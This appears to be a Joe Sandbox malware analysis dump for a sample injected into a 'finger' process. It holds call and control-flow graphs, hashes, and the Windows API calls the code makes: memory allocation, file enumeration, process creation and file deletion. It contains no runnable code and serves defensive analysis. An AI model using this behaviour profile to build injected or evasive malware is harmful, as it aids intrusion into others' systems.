99834->99814 99837 288210a 99860 289c890 99837->99860 99838 2881f4e 99838->99834 99855 289c760 99838->99855 99841 288211f 99843 288216f 99841->99843 99866 2880a00 99841->99866 99843->99834 99845 2880a00 LdrInitializeThunk 99843->99845 99869 28882a0 99843->99869 99844 28882a0 LdrInitializeThunk 99846 28822c3 99844->99846 99845->99843 99846->99843 99846->99844 99848 288830d 99847->99848 99849 288832e SetErrorMode 99848->99849 99850 2888335 99848->99850 99849->99850 99850->99833 99852 2891359 99851->99852 99853 289b630 NtAllocateVirtualMemory 99852->99853 99854 2891361 99853->99854 99854->99838 99856 289c770 99855->99856 99857 289c776 99855->99857 99856->99837 99858 289b7a0 RtlAllocateHeap 99857->99858 99859 289c79c 99858->99859 99859->99837 99861 289c800 99860->99861 99862 289b7a0 RtlAllocateHeap 99861->99862 99864 289c85d 99861->99864 99863 289c83a 99862->99863 99865 289b6c0 RtlFreeHeap 99863->99865 99864->99841 99865->99864 99873 28998b0 99866->99873 99870 28882b3 99869->99870 99878 2898be0 99870->99878 99872 28882de 99872->99843 99874 28998ca 99873->99874 99877 3092c70 LdrInitializeThunk 99874->99877 99875 2880a22 99875->99846 99877->99875 99879 2898c5b 99878->99879 99880 2898c08 99878->99880 99883 3092dd0 LdrInitializeThunk 99879->99883 99880->99872 99881 2898c7d 99881->99872 99883->99881 100095 2885d60 100096 2885d90 100095->100096 100097 28882a0 LdrInitializeThunk 100095->100097 100099 2885dbc 100096->100099 100100 2888220 100096->100100 100097->100096 100101 2888264 100100->100101 100102 2888285 100101->100102 100107 28989c0 100101->100107 100102->100096 100104 2888275 100105 2888291 100104->100105 100106 2899630 NtClose 100104->100106 100105->100096 100106->100102 100108 2898a3d 100107->100108 100110 28989eb 100107->100110 100112 3094650 LdrInitializeThunk 100108->100112 100109 2898a5f 100109->100104 100110->100104 100112->100109 99884 28994a0 99885 2899544 99884->99885 99886 28994c8 99884->99886 99887 2899557 NtReadFile 99885->99887 99893 2898b20 99894 2898bac 99893->99894 99895 2898b48 99893->99895 99898 3092ee0 LdrInitializeThunk 99894->99898 99896 2898bda 99898->99896 100115 28824e7 100116 28824f1 100115->100116 100118 288245e 100115->100118 100119 28824d3 100118->100119 100120 2898ce0 LdrInitializeThunk 100118->100120 100121 28996c0 100118->100121 100120->100118 100122 289974f 100121->100122 100123 28996eb 100121->100123 100126 3092e80 LdrInitializeThunk 100122->100126 100123->100118 100124 289977d 100124->100118 100126->100124 99899 28889bb 99900 28889cb 99899->99900 99901 288897b 99900->99901 99903 2887250 99900->99903 99904 2887266 99903->99904 99906 288729f 99903->99906 99904->99906 99907 28870c0 LdrLoadDll 99904->99907 99906->99901 99907->99906 99908 28874b0 99909 28874c8 99908->99909 99911 2887522 99908->99911 99909->99911 99912 288b430 99909->99912 99913 288b456 99912->99913 99914 288b68f 99913->99914 99939 2899a00 99913->99939 99914->99911 99916 288b4d2 99916->99914 99917 289c890 2 API calls 99916->99917 99918 288b4f1 99917->99918 99918->99914 99919 288b5c8 99918->99919 99920 2898ce0 LdrInitializeThunk 99918->99920 99922 2885ce0 LdrInitializeThunk 99919->99922 99923 288b5e7 99919->99923 99921 288b553 99920->99921 99921->99919 99926 288b55c 99921->99926 99922->99923 99928 288b677 99923->99928 99945 2898860 99923->99945 99924 288b5b0 99925 28882a0 LdrInitializeThunk 99924->99925 99931 288b5be 99925->99931 99926->99914 99926->99924 99927 288b58e 99926->99927 99942 2885ce0 99926->99942 99960 2894980 LdrInitializeThunk 99927->99960 99932 28882a0 LdrInitializeThunk 99928->99932 99931->99911 99935 288b685 99932->99935 99934 288b64e 99950 2898910 99934->99950 99935->99911 99937 288b668 99955 2898a70 99937->99955 99940 2899a1a 99939->99940 99941 2899a2b CreateProcessInternalW 99940->99941 99941->99916 99944 2885d1e 99942->99944 99961 2898ea0 99942->99961 99944->99927 99946 28988da 99945->99946 99948 2898888 99945->99948 99967 30939b0 LdrInitializeThunk 99946->99967 99947 28988fc 99947->99934 99948->99934 99951 289898a 99950->99951 99953 2898938 99950->99953 99968 3094340 LdrInitializeThunk 99951->99968 99952 28989ac 99952->99937 99953->99937 99956 2898aed 99955->99956 99958 2898a9b 99955->99958 99969 3092fb0 LdrInitializeThunk 99956->99969 99957 2898b0f 99957->99928 99958->99928 99960->99924 99962 2898f51 99961->99962 99964 2898ecf 99961->99964 99966 3092d10 LdrInitializeThunk 99962->99966 99963 2898f93 99963->99944 99964->99944 99966->99963 99967->99947 99968->99952 99969->99957 99970 288fa30 99971 288fa94 99970->99971 99972 2886460 2 API calls 99971->99972 99974 288fbc7 99972->99974 99973 288fbce 99974->99973 99999 2886570 99974->99999 99976 288fd73 99977 288fc4a 99977->99976 99978 288fd82 99977->99978 100003 288f810 99977->100003 99979 2899630 NtClose 99978->99979 99981 288fd8c 99979->99981 99982 288fc86 99982->99978 99983 288fc91 99982->99983 99984 289b7a0 RtlAllocateHeap 99983->99984 99985 288fcba 99984->99985 99986 288fcd9 99985->99986 99987 288fcc3 99985->99987 100012 288f700 CoInitialize 99986->100012 99988 2899630 NtClose 99987->99988 99990 288fccd 99988->99990 99991 288fce7 100015 2899120 99991->100015 99993 288fd62 99994 2899630 NtClose 99993->99994 99995 288fd6c 99994->99995 99997 289b6c0 RtlFreeHeap 99995->99997 99996 288fd05 99996->99993 99998 2899120 LdrInitializeThunk 99996->99998 99997->99976 99998->99996 100000 2886595 99999->100000 100019 2898fe0 100000->100019 100004 288f82c 100003->100004 100005 2884700 LdrLoadDll 100004->100005 100007 288f84a 100005->100007 100006 288f853 100006->99982 100007->100006 100008 2884700 LdrLoadDll 100007->100008 100009 288f91e 100008->100009 100010 2884700 LdrLoadDll 100009->100010 100011 288f97b 100009->100011 100010->100011 100011->99982 100013 288f765 100012->100013 100014 288f7fb CoUninitialize 100013->100014 100014->99991 100016 289913a 100015->100016 100024 3092ba0 LdrInitializeThunk 100016->100024 100017 2899167 100017->99996 100020 2898ffa 100019->100020 100023 3092c60 LdrInitializeThunk 100020->100023 100021 2886609 100021->99977 100023->100021 100024->100017 100025 288c7b0 100027 288c7d9 100025->100027 100026 288c8dd 100027->100026 100028 288c883 FindFirstFileW 100027->100028 100028->100026 100030 288c89e 100028->100030 100029 288c8c4 FindNextFileW 100029->100030 100031 288c8d6 FindClose 100029->100031 100030->100029 100031->100026 100032 2889db0 100034 2889dbf 100032->100034 100033 2889dc6 100034->100033 100035 289b6c0 RtlFreeHeap 100034->100035 100035->100033 100036 2886f30 100037 2886f5a 100036->100037 100040 28880d0 100037->100040 100039 2886f84 100041 28880ed 100040->100041 100047 2898dc0 100041->100047 100043 288813d 100044 2888144 100043->100044 100045 2898ea0 LdrInitializeThunk 100043->100045 100044->100039 100046 288816d 100045->100046 100046->100039 100048 2898e5b 100047->100048 100049 2898deb 100047->100049 100052 3092f30 LdrInitializeThunk 100048->100052 100049->100043 100050 2898e91 100050->100043 100052->100050 100127 288aef0 100132 288ac00 100127->100132 100129 288aefd 100146 288a870 100129->100146 100131 288af19 100133 288ac25 100132->100133 100157 2888510 100133->100157 100136 288ad70 100136->100129 100138 288ad87 100138->100129 100139 288ad7e 100139->100138 100141 288ae75 100139->100141 100176 288a2c0 100139->100176 100143 288aeda 100141->100143 100185 288a630 100141->100185 100144 289b6c0 RtlFreeHeap 100143->100144 100145 288aee1 100144->100145 100145->100129 100147 288a886 100146->100147 100154 288a891 100146->100154 100148 289b7a0 RtlAllocateHeap 100147->100148 100148->100154 100149 288a8b5 100149->100131 100150 2888510 GetFileAttributesW 100150->100154 100151 288abd2 100152 288abeb 100151->100152 100153 289b6c0 RtlFreeHeap 100151->100153 100152->100131 100153->100152 100154->100149 100154->100150 100154->100151 100155 288a2c0 RtlFreeHeap 100154->100155 100156 288a630 RtlFreeHeap 100154->100156 100155->100154 100156->100154 100158 2888531 100157->100158 100159 2888538 GetFileAttributesW 100158->100159 100160 2888543 100158->100160 100159->100160 100160->100136 100161 2893550 100160->100161 100162 289355e 100161->100162 100163 2893565 100161->100163 100162->100139 100164 2884700 LdrLoadDll 100163->100164 100165 289359a 100164->100165 100166 28935a9 100165->100166 100189 2893010 LdrLoadDll 100165->100189 100168 289b7a0 RtlAllocateHeap 100166->100168 100172 2893757 100166->100172 100169 28935c2 100168->100169 100170 289374d 100169->100170 100169->100172 100174 28935de 100169->100174 100171 289b6c0 RtlFreeHeap 100170->100171 100170->100172 100171->100172 100172->100139 100173 289b6c0 RtlFreeHeap 100175 2893741 100173->100175 100174->100172 100174->100173 100175->100139 100177 288a2e6 100176->100177 100190 288dd30 100177->100190 100179 288a358 100181 288a4e0 100179->100181 100182 288a376 100179->100182 100180 288a4c5 100180->100139 100181->100180 100183 288a180 RtlFreeHeap 100181->100183 100182->100180 100195 288a180 100182->100195 100183->100181 100186 288a656 100185->100186 100187 288dd30 RtlFreeHeap 100186->100187 100188 288a6dd 100187->100188 100188->100141 100189->100166 100192 288dd54 100190->100192 100191 288dd61 100191->100179 100192->100191 100193 289b6c0 RtlFreeHeap 100192->100193 100194 288dda4 100193->100194 100194->100179 100196 288a19d 100195->100196 100199 288ddc0 100196->100199 100198 288a2a3 100198->100182 100200 288dde4 100199->100200 100201 288de8e 100200->100201 100202 289b6c0 RtlFreeHeap 100200->100202 100201->100198 100202->100201 100203 2880f70 100204 2880f89 100203->100204 100205 2884700 LdrLoadDll 100204->100205 100206 2880fa7 100205->100206 100207 2880ff3 100206->100207 100208 2880fe0 PostThreadMessageW 100206->100208 100208->100207 100053 2890330 100054 289034d 100053->100054 100055 2884700 LdrLoadDll 100054->100055 100056 289036b 100055->100056 100209 2896270 100210 28962ca 100209->100210 100212 28962d7 100210->100212 100213 2893c80 100210->100213 100214 289b630 NtAllocateVirtualMemory 100213->100214 100216 2893cc1 100214->100216 100215 2893dbd 100215->100212 100216->100215 100217 2884700 LdrLoadDll 100216->100217 100218 2893d07 100217->100218 100218->100215 100219 2893d45 Sleep 100218->100219 100219->100218

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 165 2879f20-287a1b8 166 287a1c9-287a1d2 165->166 167 287a1d4-287a1e7 166->167 168 287a1e9-287a1f7 166->168 167->166 170 287a202-287a209 168->170 171 287a20b-287a246 170->171 172 287a248 170->172 171->170 173 287a24f-287a253 172->173 175 287a255-287a26c 173->175 176 287a26e-287a27e 173->176 175->173 176->176 177 287a280-287a287 176->177 178 287a2b1 177->178 179 287a289-287a29b 177->179 182 287a2b8-287a2bc 178->182 180 287a2a2-287a2a4 179->180 181 287a29d-287a2a1 179->181 183 287a2a6-287a2ac 180->183 184 287a2af 180->184 181->180 185 287a2be-287a2e8 182->185 186 287a2ea-287a2f4 182->186 183->184 184->177 185->182 187 287a305-287a311 186->187 188 287a324-287a32d 187->188 189 287a313-287a322 187->189 191 287a333-287a33d 188->191 192 287a4fd-287a504 188->192 189->187 195 287a34e-287a357 191->195 193 287a5cc-287a5d6 192->193 194 287a50a-287a514 192->194 196 287a525-287a531 194->196 197 287a367-287a36b 195->197 198 287a359-287a365 195->198 199 287a533-287a546 196->199 200 287a548 call 289b320 196->200 201 287a377-287a381 197->201 202 287a36d-287a374 197->202 198->195 204 287a516-287a51f 199->204 207 287a54d-287a557 200->207 206 287a392-287a39e 201->206 202->201 204->196 208 287a3b4-287a3b7 206->208 209 287a3a0-287a3b2 206->209 210 287a568-287a571 207->210 211 287a3bd-287a3c6 208->211 209->206 215 287a587-287a58b 210->215 216 287a573-287a585 210->216 213 287a3eb-287a3fa 211->213 214 287a3c8-287a3e9 211->214 217 287a3fc-287a406 213->217 218 287a44b-287a452 213->218 214->211 215->193 220 287a58d-287a5ae 215->220 216->210 221 287a417-287a420 217->221 222 287a454-287a487 218->222 223 287a489-287a48f 218->223 224 287a5b0-287a5b9 220->224 225 287a5bc-287a5ca 220->225 226 287a436-287a446 221->226 227 287a422-287a434 221->227 222->218 228 287a493-287a497 223->228 224->225 225->215 226->192 227->221 230 287a499-287a4b6 228->230 231 287a4b8-287a4c2 228->231 230->228 232 287a4c4-287a4d4 231->232 233 287a4f8 231->233 234 287a4e7-287a4f0 232->234 235 287a4d6-287a4e5 232->235 233->188 236 287a4f6 234->236 235->236 236->231
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 5Z$9$<$>$L$N$N$Pw$So$`$fN$j$m$n$X$s
                                                                                              • API String ID: 0-2357910541
                                                                                              • Opcode ID: 9582a658eb137406f3bf7cdfd2278e0763a54f8c99eff3a0a33e665a6ef9d154
                                                                                              • Instruction ID: 176fadd7b4c288ba2c4c130d5a8bfa74eb89cdb48b08a1a6fcb70dad1e856cac
                                                                                              • Opcode Fuzzy Hash: 9582a658eb137406f3bf7cdfd2278e0763a54f8c99eff3a0a33e665a6ef9d154
                                                                                              • Instruction Fuzzy Hash: 9902B2B8D05229CFEB28CF98C8947EDBBB2BB44308F1081D9D509BB281D7795A85CF55
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0288C894
                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0288C8CF
                                                                                              • FindClose.KERNELBASE(?), ref: 0288C8DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 3541575487-0
                                                                                              • Opcode ID: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                                                              • Instruction ID: b2df5359fde612536febafc5ee7dd01ffc0b7e394937bbd9dfca82d89c28487b
                                                                                              • Opcode Fuzzy Hash: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                                                              • Instruction Fuzzy Hash: 63316E79A40308BBDB24EBA4CC89FEF777DDB44744F144499B908E6180DA70AA848BA1
                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?,?,?), ref: 02899438
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                                                              • Instruction ID: 77468071aa12d8a41de21ba2659b834d47dc120dcb7e9d20439ecb3dee0f8cbc
                                                                                              • Opcode Fuzzy Hash: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                                                              • Instruction Fuzzy Hash: FA31D5B9A00648ABCB14DF99D880EDEB7F9EF8C700F148219F919A7340D730A951CFA5
                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?), ref: 02899580
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                                                              • Instruction ID: 54025025ce606f13948ebb68687e15b21ebfd96d8bd98181fbcd3a74a9c5e5ab
                                                                                              • Opcode Fuzzy Hash: e6f3ba0a2a121550311ff52ac0598f0ab7352921171cdb98717c8912cdbe003b
                                                                                              • Instruction Fuzzy Hash: 4531C7B9A00608ABCB14DF99D880EDFB7F9EF88714F148219FD19A7240D734A911CFA5
                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(161FBA40,?,028981AF,00000000,00000004,00003000,?,?,?,?,?,028981AF,02881F4E), ref: 02899855
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                                                              • Instruction ID: 4808424dba997cfe3f77a98dd7196e49edb12c269b9339f3ad130cd1ef098e3f
                                                                                              • Opcode Fuzzy Hash: a1c1bc1c7ed6e412f4197ea02707f05ce7fd928f0e11f28bcc27ba9ea0b3128d
                                                                                              • Instruction Fuzzy Hash: 172126B9A00208ABDB14DF99CC41EAFB7B9EF88700F10821DFD18A7240D734A911CFA5
                                                                                              APIs
                                                                                              • NtDeleteFile.NTDLL(161FBA40), ref: 02899620
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                                                              • Instruction ID: 0e0e1148cec6f95c81724970bd041dc38d446b9685e9de763e78ed24620adc2c
                                                                                              • Opcode Fuzzy Hash: d7fd5be2052f01351cd39b10a120a2b64c712234ba1b204dfdc6d8a01e2bf1db
                                                                                              • Instruction Fuzzy Hash: 4E11A079610608BBDB20EB69CC41FEB73ADDF89704F148159FA09A7241D771A9058FF2
                                                                                              APIs
                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02899661
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                              • Instruction ID: 03c3f9810e7bcc5d448c5eeaafde87fd669ca12ba5871716a3cb5f0cc9553caf
                                                                                              • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                              • Instruction Fuzzy Hash: 46E0467A2002047BC620EA5ADC40F9BB7AEDFC6710F008015FA08A7240CA70BA12CAE5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: e8aad0e38ee1d027ecc78bf005708dc1004c30bcaff68d78624033a1c9b2971b
                                                                                              • Instruction ID: 21ba881b6681b1b802150631fc2dc8d423a61d5f7286c789c3cf9f841ad1aeef
                                                                                              • Opcode Fuzzy Hash: e8aad0e38ee1d027ecc78bf005708dc1004c30bcaff68d78624033a1c9b2971b
                                                                                              • Instruction Fuzzy Hash: A7900271B06C0412A140B1DC9884546444597F0301B55C011E0424554C8B148A565361
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 1af985360e47595994e062da73b0b389449bb4869df57d3eccd403d1047b0f21
                                                                                              • Instruction ID: 0cd9704f9aff4e8afbc035e489f577d69f64ef24f0d723d0e60d4103a81158e9
                                                                                              • Opcode Fuzzy Hash: 1af985360e47595994e062da73b0b389449bb4869df57d3eccd403d1047b0f21
                                                                                              • Instruction Fuzzy Hash: 1D9002A1B02904425140B1DC9804406644597F1301395C115A0554560C871889559269
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 78c3b756e0cbef5bcd985e92b56d6d4a231b3893ff9d6ea9f2d9d6a1fac2cd39
                                                                                              • Instruction ID: f57441aa48abd3bcfdc278d24b964b751ec3e4a0672d7adbb248889a3ba76b9c
                                                                                              • Opcode Fuzzy Hash: 78c3b756e0cbef5bcd985e92b56d6d4a231b3893ff9d6ea9f2d9d6a1fac2cd39
                                                                                              • Instruction Fuzzy Hash: 929002A1703804035105B1DC9414616444A87F0201B55C021E1014590DC62589916125
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: e2172007bb43175ea353705dbb45286fb05c8a1f9a0bcc99ad8f02925314eef7
                                                                                              • Instruction ID: 0e2c121733997f965071a45692f108f47d98dd86e5c9e8d2bbd514bd150ab23e
                                                                                              • Opcode Fuzzy Hash: e2172007bb43175ea353705dbb45286fb05c8a1f9a0bcc99ad8f02925314eef7
                                                                                              • Instruction Fuzzy Hash: 9B900271B0680C02E150B1DC9414746044587E0301F55C011A0024654D87558B5576A1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: dba7e18b01d0ccc20cbc086a30d25bc8756040ac8a8bacc1e278dd7bd939b8b8
                                                                                              • Instruction ID: ab03a3d5a1f824ff1639decfa7140a8ea5bee114c5addcb584a3f9150e619831
                                                                                              • Opcode Fuzzy Hash: dba7e18b01d0ccc20cbc086a30d25bc8756040ac8a8bacc1e278dd7bd939b8b8
                                                                                              • Instruction Fuzzy Hash: 1A90027170684C42E140B1DC9404A46045587E0305F55C011A0064694D97258E55B661
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 72946bad9fd3def89e2e82cedcb250b0bd0f25d67d271046f61405dceb5458ff
                                                                                              • Instruction ID: 3db3ef857e0cd491d8d4dc0c151d9b7d3a58bb7d594343858fe93705df94e34c
                                                                                              • Opcode Fuzzy Hash: 72946bad9fd3def89e2e82cedcb250b0bd0f25d67d271046f61405dceb5458ff
                                                                                              • Instruction Fuzzy Hash: 8D90027170280C02E180B1DC940464A044587E1301F95C015A0025654DCB158B5977A1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 7a50d1bdd127c266be118998907985475c5596cf223ac3b42452aa5384a2800c
                                                                                              • Instruction ID: 7e10a87195fa1a5cbdec14d7285c3d171460eb692888b4fc1c8cb4127583a2ea
                                                                                              • Opcode Fuzzy Hash: 7a50d1bdd127c266be118998907985475c5596cf223ac3b42452aa5384a2800c
                                                                                              • Instruction Fuzzy Hash: 86900475713C04031105F5DC570450704C7C7F5351355C031F1015550CD731CD715131
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: aa87c209a4d4f433fd1540710d125e82c349201a48712adfc9171e9bbcd263e1
                                                                                              • Instruction ID: 08c42b6c5dff3bcc14d8db36dc3ef634afda4c323ad2abd2413d1fe325b55848
                                                                                              • Opcode Fuzzy Hash: aa87c209a4d4f433fd1540710d125e82c349201a48712adfc9171e9bbcd263e1
                                                                                              • Instruction Fuzzy Hash: 55900265722804021145F5DC560450B088597E6351395C015F1416590CC72189655321
                                                                                              APIs
                                                                                              Memory Dump Source
